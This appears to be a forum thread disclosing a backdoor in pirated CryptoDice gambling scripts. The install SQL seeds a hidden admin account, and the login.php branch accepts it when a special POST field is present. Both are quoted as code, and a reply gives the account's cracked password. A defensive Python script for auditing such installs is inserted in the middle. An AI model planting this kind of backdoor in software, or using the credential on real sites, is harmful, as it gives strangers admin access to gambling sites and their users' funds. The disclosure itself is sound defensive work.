I will post my findings soon.
Backdoor Found
CoinDice.sql installs a table named "ga_players" which actually contains an admin account named "playertest" on install; you will see why this is an admin account in the next part.
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this, I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php).
Surprise, surprise.
If the $_POST variable has any data for "ga_playertest", it allows a login from the "ga_players" table instead of the admin table, which in this case holds our fake admin "playertest": (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
// backdoor branch: reached when $_POST['ga_playertest'] is set (the preceding if line is not quoted in the post)
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
Everybody should remove this ASAP. You don't know what else could be hidden in here.
I am unsure what password this MD5 hash ("6d2aff483952d904179ca0c8c536a2c7") is; maybe someone with more experience in cracking passwords would know.
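As an added illustration (not code from this thread or from the CryptoDice project), the following Python script shows how a defender can audit an install dump and a login script for the two things the post above describes: accounts seeded at install time with an unsalted MD5-style hash, and an admin login that authenticates against more than one table. The sample SQL reproduces the quoted ga_players excerpt plus a constructed, harmless `settings` table for contrast; the sample PHP is constructed from the quoted snippet, with the missing `if` condition assumed to be `isset($_POST['ga_playertest'])` as the post describes. The row parser is deliberately simple (it splits on commas) and is meant for install dumps of this shape, not arbitrary SQL.

```python
import re

# Constructed sample install dump: the ga_players part is the excerpt quoted
# in the post; the `settings` table is a constructed harmless addition.
SAMPLE_SQL = """
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
CREATE TABLE `settings` (
  `name` varchar(20) NOT NULL,
  `value` text NOT NULL
);
INSERT INTO `settings` (`name`, `value`) VALUES
('site_name', 'Dice');
"""

# Constructed sample login script built from the quoted snippet; the if
# condition is an assumption based on the post's description.
SAMPLE_PHP = """<?php
if (isset($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
"""

INSERT_RE = re.compile(
    r"INSERT INTO `(?P<table>\w+)`\s*\((?P<cols>[^)]*)\)\s*VALUES\s*(?P<rows>.*?);",
    re.DOTALL | re.IGNORECASE,
)
MD5_RE = re.compile(r"^[0-9a-f]{32}$")
PASSWORD_COLS = {"passwd", "password", "pass", "pwd", "hash"}
USERNAME_COLS = {"username", "user", "login", "name"}


def find_seeded_accounts(sql_text):
    """Return one dict per row an install dump inserts into a table that has
    a password-like column: table, username, stored hash, and whether the
    hash looks like a bare (unsalted) MD5 digest."""
    found = []
    for m in INSERT_RE.finditer(sql_text):
        cols = [c.strip().strip("`").lower() for c in m.group("cols").split(",")]
        pw_idx = next((i for i, c in enumerate(cols) if c in PASSWORD_COLS), None)
        if pw_idx is None:
            continue  # no credential column, not an account table
        name_idx = next((i for i, c in enumerate(cols) if c in USERNAME_COLS), None)
        for row in re.findall(r"\(([^)]*)\)", m.group("rows")):
            values = [v.strip().strip("'") for v in row.split(",")]
            found.append({
                "table": m.group("table"),
                "username": values[name_idx] if name_idx is not None else "?",
                "hash": values[pw_idx],
                "md5_like": bool(MD5_RE.match(values[pw_idx].lower())),
            })
    return found


def credential_tables(php_text):
    """Return the sorted set of tables a script reads credentials from:
    every table named in a query line that also references a password column."""
    tables = []
    for line in php_text.splitlines():
        lowered = line.lower()
        if "passwd" in lowered or "password" in lowered:
            tables += re.findall(r"FROM\s+`(\w+)`", line, re.IGNORECASE)
    return sorted(set(tables))


def audit(sql_text, php_text, admin_table="admins"):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for acct in find_seeded_accounts(sql_text):
        kind = "unsalted MD5-style" if acct["md5_like"] else "hashed"
        findings.append(
            f"install dump seeds account '{acct['username']}' in `{acct['table']}` "
            f"with a {kind} password")
    extra = [t for t in credential_tables(php_text) if t != admin_table]
    if extra:
        findings.append("admin login also checks credentials against: "
                        + ", ".join(f"`{t}`" for t in extra))
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_SQL, SAMPLE_PHP):
        print("FINDING:", line)
```

Run against the samples, the script reports the seeded `playertest` row in `ga_players` and the fact that the admin login reads credentials from `ga_players` as well as `admins`. The second check is the more general one: an admin login should authenticate against exactly one table, so any extra table in that set is worth reading the surrounding code for, whatever the install dump contains.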
cloverme, I am assuming you have the original game? What line is meant to be in login.php?
I cracked the MD5 hash:
6d2aff483952d904179ca0c8c536a2c7:playertest1
I advise anybody to USE THE ORIGINAL version from johny1976, because the posted scripts have many backdoors and they are pirated copies with NO licence...